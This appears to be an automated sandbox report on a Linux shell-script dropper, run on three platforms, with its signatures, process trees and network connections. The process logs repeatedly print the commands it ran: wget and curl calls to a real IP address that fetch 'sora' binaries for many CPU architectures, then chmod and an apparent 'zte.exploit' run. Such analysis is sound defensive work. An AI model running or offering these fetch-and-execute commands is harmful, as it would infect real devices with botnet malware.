Analysis Overview
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
Threat Level: Shows suspicious behavior
The file f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 03:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto | Count |
|---|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp | 1 |
| N/A | 224.0.0.251:5353 | | udp | 1 |
| NL | 93.123.85.141:80 | | tcp | 12 |
| US | 151.101.1.91:443 | | tcp | 1 |
| NL | 93.123.85.141:80 | | tcp | 15 |
| GB | 89.187.167.9:443 | | tcp | 1 |
| GB | 185.125.188.62:443 | | tcp | 2 |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-armhf-20240418-en
Max time kernel
11s
Max time network
12s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 |
Checks CPU configuration
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A | 14 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 14 |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A | 14 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto | Count |
|---|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp | 28 |
Files
memory/783-1-0xb677d000-0xb678e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-mipsbe-20240418-en
Max time kernel
27s
Max time network
25s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 14 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
